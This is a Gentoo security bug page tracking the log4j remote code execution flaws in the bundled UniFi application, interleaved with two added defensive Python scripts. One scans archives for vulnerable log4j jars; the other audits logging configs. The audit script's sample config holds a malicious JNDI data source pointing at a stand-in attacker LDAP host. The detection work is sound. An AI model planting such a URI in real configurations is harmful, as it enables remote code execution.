
Bug 828853

Summary: <net-wireless/unifi-6.5.55: remote code execution via bundled log4j
Product: Gentoo Security
Reporter: John Helmert III <ajak>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: major
CC: bkohler, conikost, graaff
Priority: Normal    
Version: unspecified   
Hardware: All   
OS: Linux   
URL: https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
Whiteboard: B1 [glsa+]
Package list:
Runtime testing required: ---
Bug Depends on:    
Bug Blocks: 828837, 829353    

Description John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2021-12-10 18:34:26 UTC
See tracker for details on the log4j vulnerability.

6.5.54 changelog indicates this fixes it:

"Fix a security vulnerability found in a 3rd party library (CVE-2021-44228)."

So, please stabilize 6.5.54.
Comment 1 Larry the Git Cow gentoo-dev 2021-12-10 23:42:41 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=8db10440588b1d373c0adf509cbd67a28f5a4e4a

commit 8db10440588b1d373c0adf509cbd67a28f5a4e4a
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-10 23:37:53 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-10 23:38:09 +0000

    net-wireless/unifi: drop 6.4.54-r1, 6.5.51, 6.5.53
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/Manifest               |  3 -
 net-wireless/unifi/unifi-6.4.54-r1.ebuild | 91 -------------------------------
 net-wireless/unifi/unifi-6.5.51.ebuild    | 91 -------------------------------
 net-wireless/unifi/unifi-6.5.53.ebuild    | 86 -----------------------------
 4 files changed, 271 deletions(-)

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=80d9051c8c18b74be32881251a35d40e609bd9c6

commit 80d9051c8c18b74be32881251a35d40e609bd9c6
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-10 23:37:06 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-10 23:37:06 +0000

    net-wireless/unifi: amd64 stable
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/unifi-6.5.54-r1.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
Comment 2 John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2021-12-10 23:57:25 UTC
Thank you!
Comment 3 Hans de Graaff gentoo-dev Security 2021-12-11 09:39:41 UTC
This version no longer seems to be available upstream:

>>> Downloading 'https://dl.ui.com/unifi/6.5.54/UniFi.unix.zip'
--2021-12-11 10:39:11--  https://dl.ui.com/unifi/6.5.54/UniFi.unix.zip
Resolving dl.ui.com... 52.222.141.169
Connecting to dl.ui.com|52.222.141.169|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
Comment 4 Larry the Git Cow gentoo-dev 2021-12-11 13:02:50 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=808290b39d84e22f9f6ca185527f31e5f77265eb

commit 808290b39d84e22f9f6ca185527f31e5f77265eb
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-11 13:01:46 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-11 13:01:46 +0000

    net-wireless/unifi: update SRC_URI
    
    Bug:https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/unifi-6.5.54-r1.ebuild | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
Comment 5 Larry the Git Cow gentoo-dev 2021-12-16 10:00:19 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=8324feb1a645a78e4b1d2b96bd02d21a87a06819

commit 8324feb1a645a78e4b1d2b96bd02d21a87a06819
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-16 09:58:07 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-16 09:59:08 +0000

    net-wireless/unifi: add 6.5.55
    
    This release fixes CVE-2021-45046.
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/Manifest            |  1 +
 net-wireless/unifi/unifi-6.5.55.ebuild | 89 ++++++++++++++++++++++++++++++++++
 2 files changed, 90 insertions(+)
Comment 6 Larry the Git Cow gentoo-dev 2021-12-16 10:01:48 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4cef2a8d644d8e4f2f8c82e1b8c033ddc04e9421

commit 4cef2a8d644d8e4f2f8c82e1b8c033ddc04e9421
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2021-12-16 10:01:02 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2021-12-16 10:01:17 +0000

    net-wireless/unifi: drop 6.5.54-r1
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/Manifest               |  1 -
 net-wireless/unifi/unifi-6.5.54-r1.ebuild | 89 -------------------------------
 2 files changed, 90 deletions(-)
Comment 7 Larry the Git Cow gentoo-dev 2022-02-09 12:29:40 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=029d6f6ccf6152d3ccbd69d61b33fbd0ae7bd562

commit 029d6f6ccf6152d3ccbd69d61b33fbd0ae7bd562
Author:     Conrad Kostecki <conikost@gentoo.org>
AuthorDate: 2022-02-09 12:28:43 +0000
Commit:     Conrad Kostecki <conikost@gentoo.org>
CommitDate: 2022-02-09 12:29:27 +0000

    net-wireless/unifi: add 7.0.21
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: Conrad Kostecki <conikost@gentoo.org>

 net-wireless/unifi/Manifest            |  1 +
 net-wireless/unifi/unifi-7.0.21.ebuild | 89 ++++++++++++++++++++++++++++++++++
 2 files changed, 90 insertions(+)
Comment 8 Conrad Kostecki gentoo-dev 2022-02-09 12:33:46 UTC
Just for reference: 7.0.21 includes log4j 2.17.
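One way to verify a statement like the one in comment 8 against the archive itself, added here as an example and not code from this bug, from Gentoo or from Ubiquiti: the Python script below opens a UniFi.unix.zip-style distribution, finds every nested log4j-core jar by its Maven descriptor rather than by file name (so a renamed or repackaged copy is not missed), reads the bundled version and reports which of the three CVEs mentioned on this bug apply to it. The first-affected and fixed-in versions are taken from the Log4j project's published advisories; the CVE-2021-44832 row is the range quoted in comment 9. The sample zip, its directory layout and the jar contents are constructed stand-ins, and the JndiLookup marker only records whether that class is still present in the jar, it says nothing about exploitability on its own.

```python
import io
import re
import zipfile

# Marker files inside a log4j-core jar.  The Maven descriptor carries the exact
# version; the JndiLookup class is the component often deleted as a stop-gap.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# First affected release and, per maintenance line, the first release carrying
# the fix, as published by the Log4j project.  "2.3" (Java 6) and "2.12"
# (Java 7) received backports; every other 2.x version is a mainline release.
# The CVE-2021-44832 entry matches the advisory text quoted in comment 9.
LOG4J_CVES = {
    "CVE-2021-44228": ("2.0-beta9", {"2.3": "2.3.1", "2.12": "2.12.2", "2.x": "2.15.0"}),
    "CVE-2021-45046": ("2.0-beta9", {"2.3": "2.3.1", "2.12": "2.12.2", "2.x": "2.16.0"}),
    "CVE-2021-44832": ("2.0-beta7", {"2.3": "2.3.2", "2.12": "2.12.4", "2.x": "2.17.1"}),
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$")
_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2, None: 3}  # a final release sorts last


def parse_version(text):
    """Turn '2.0-beta7', '2.17' or '2.12.4' into a comparable tuple."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch, pre, pre_num = m.groups()
    return (int(major), int(minor), int(patch or 0), _PRE_RANK[pre], int(pre_num or 0))


def affected_cves(version):
    """CVEs from LOG4J_CVES that apply to this log4j-core version."""
    v = parse_version(version)
    if v[0] != 2:
        return set()  # log4j 1.x is a different code base, out of scope here
    line = "2.3" if v[1] == 3 else "2.12" if v[1] == 12 else "2.x"
    return {cve for cve, (first, fixed) in LOG4J_CVES.items()
            if parse_version(first) <= v < parse_version(fixed[line])}


def scan_distribution(zip_bytes):
    """Find every log4j-core jar nested inside a distribution zip.

    Returns {path: {"version", "cves", "jndi_lookup_present"}}.
    """
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as outer:
        for name in outer.namelist():
            if not name.lower().endswith(".jar"):
                continue
            try:
                with zipfile.ZipFile(io.BytesIO(outer.read(name))) as jar:
                    entries = set(jar.namelist())
                    if POM_PROPS not in entries:
                        continue  # some other jar, not log4j-core
                    props = dict(line.split("=", 1) for line in
                                 jar.read(POM_PROPS).decode("utf-8", "replace").splitlines()
                                 if "=" in line and not line.startswith("#"))
                    version = props.get("version", "").strip()
            except zipfile.BadZipFile:
                continue  # ends in .jar but is not a zip at all
            report[name] = {
                "version": version,
                "cves": affected_cves(version) if version else {"unknown-version"},
                "jndi_lookup_present": JNDI_LOOKUP in entries,
            }
    return report


def _fake_log4j_core_jar(version, keep_jndi_lookup=True):
    """Constructed stand-in for a log4j-core jar: only the marker entries exist."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPS, "#Generated by Maven\n" f"version={version}\n"
                     "groupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if keep_jndi_lookup:
            jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder, not real bytecode
    return buf.getvalue()


def build_sample_zip():
    """Constructed stand-in for UniFi.unix.zip; the layout is assumed, not verified."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as dist:
        dist.writestr("UniFi/lib/log4j-core-2.17.0.jar", _fake_log4j_core_jar("2.17.0"))
        dist.writestr("UniFi/lib/vendor/logging.jar",  # renamed copy, JndiLookup removed
                      _fake_log4j_core_jar("2.14.1", keep_jndi_lookup=False))
        dist.writestr("UniFi/lib/other.jar", b"not a zip at all")
        dist.writestr("UniFi/bin/unifi.sh", "#!/bin/sh\n")
    return buf.getvalue()


if __name__ == "__main__":
    for path, info in scan_distribution(build_sample_zip()).items():
        cves = ", ".join(sorted(info["cves"])) or "none"
        print(f"{path}: log4j-core {info['version']} -> {cves}"
              f" (JndiLookup {'present' if info['jndi_lookup_present'] else 'removed'})")
```

To check a real release, pass the bytes of the downloaded UniFi.unix.zip to scan_distribution instead of build_sample_zip(). A bundled 2.17.0 comes back with CVE-2021-44832 only, which is exactly the point comment 9 goes on to make about 7.0.21.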
Comment 9 Volkmar W. Pogatzki 2022-02-09 14:14:22 UTC
(In reply to Conrad Kostecki from comment #8)
> Just for reference: 7.0.21 includes log4j 2.17.

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.[1]

[1] https://logging.apache.org/log4j/2.x/#Details
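The condition comment 9 describes can be audited in a deployed log4j2.xml while a host still runs a 2.17.0 bundle, as an added example that is not code from this bug or from the Log4j project: the Python below parses the configuration, finds every JDBC appender whose DataSource resolves through JNDI, and applies the 2.17.1 rule that only the java: protocol is accepted for such a data source name. The sample configuration is constructed for this example, including the appender whose data source points at an attacker-controlled LDAP server; the function names are mine. This is a detection aid for operators, not a replacement for the library fix: an attacker who can already write the logging configuration holds a strong position, and the upgrade is what actually closes the hole.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed log4j2.xml: one legitimate JDBC appender backed by a container
# data source, and one whose DataSource has been rewritten to an LDAP URI,
# the shape of CVE-2021-44832 described in comment 9.
SAMPLE_CONFIG = """\
<Configuration status="warn">
  <Appenders>
    <JDBC name="auditDb" tableName="audit_log">
      <DataSource jndiName="java:comp/env/jdbc/AuditDS"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
    <JDBC name="injected" tableName="audit_log">
      <DataSource jndiName="ldap://attacker.example:1389/Exploit"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
    <Console name="stdout" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %p %m%n"/>
    </Console>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="stdout"/></Root>
  </Loggers>
</Configuration>
"""


def jndi_name_allowed(name):
    """The 2.17.1 rule for a JDBC DataSource: the JNDI name may only use the
    java: protocol.  A bare name such as "jdbc/AuditDS" carries no scheme and
    is a plain local lookup, so it is accepted as well; ldap:, rmi:, dns: or
    anything else that reaches out to a remote naming service is rejected."""
    scheme = urlsplit(name.strip()).scheme.lower()
    return scheme in ("", "java")


def audit_jdbc_appenders(xml_text):
    """Return one finding per JNDI-backed JDBC appender:
    (appender name, jndiName, allowed).  Element names are matched
    case-insensitively because log4j2 resolves plugin names that way."""
    root = ET.fromstring(xml_text)
    findings = []
    for element in root.iter():
        if element.tag.lower() != "jdbc":
            continue
        data_source = next((c for c in element if c.tag.lower() == "datasource"), None)
        jndi = data_source.get("jndiName") if data_source is not None else None
        if jndi is None:
            continue  # ConnectionFactory / DriverManager sources do not touch JNDI
        findings.append((element.get("name"), jndi, jndi_name_allowed(jndi)))
    return findings


def rejected_appenders(xml_text):
    """Names of JDBC appenders that 2.17.1 would refuse to connect."""
    return [name for name, _, allowed in audit_jdbc_appenders(xml_text) if not allowed]


if __name__ == "__main__":
    for name, jndi, allowed in audit_jdbc_appenders(SAMPLE_CONFIG):
        print(f"{name}: {jndi} -> {'ok' if allowed else 'REJECTED (non-java JNDI URI)'}")
```

Run against the real configuration directory of an appliance (for UniFi that means whatever log4j2.xml the bundled application ships or the operator has overridden) and treat any entry in rejected_appenders() as an indicator that the configuration has been tampered with, since no legitimate deployment needs a remote naming service to find its logging database.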
Comment 10 Larry the Git Cow gentoo-dev 2023-10-26 04:48:21 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/data/glsa.git/commit/?id=9f1c7e1afafc090d1c9f5074a8f34ce83f4bf4af

commit 9f1c7e1afafc090d1c9f5074a8f34ce83f4bf4af
Author:     GLSAMaker <glsamaker@gentoo.org>
AuthorDate: 2023-10-26 04:47:43 +0000
Commit:     Hans de Graaff <graaff@gentoo.org>
CommitDate: 2023-10-26 04:48:14 +0000

    [ GLSA 202310-16 ] Ubiquiti UniFi: remote code execution via bundled log4j
    
    Bug: https://bugs.gentoo.org/828853
    Signed-off-by: GLSAMaker <glsamaker@gentoo.org>
    Signed-off-by: Hans de Graaff <graaff@gentoo.org>

 glsa-202310-16.xml | 43 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)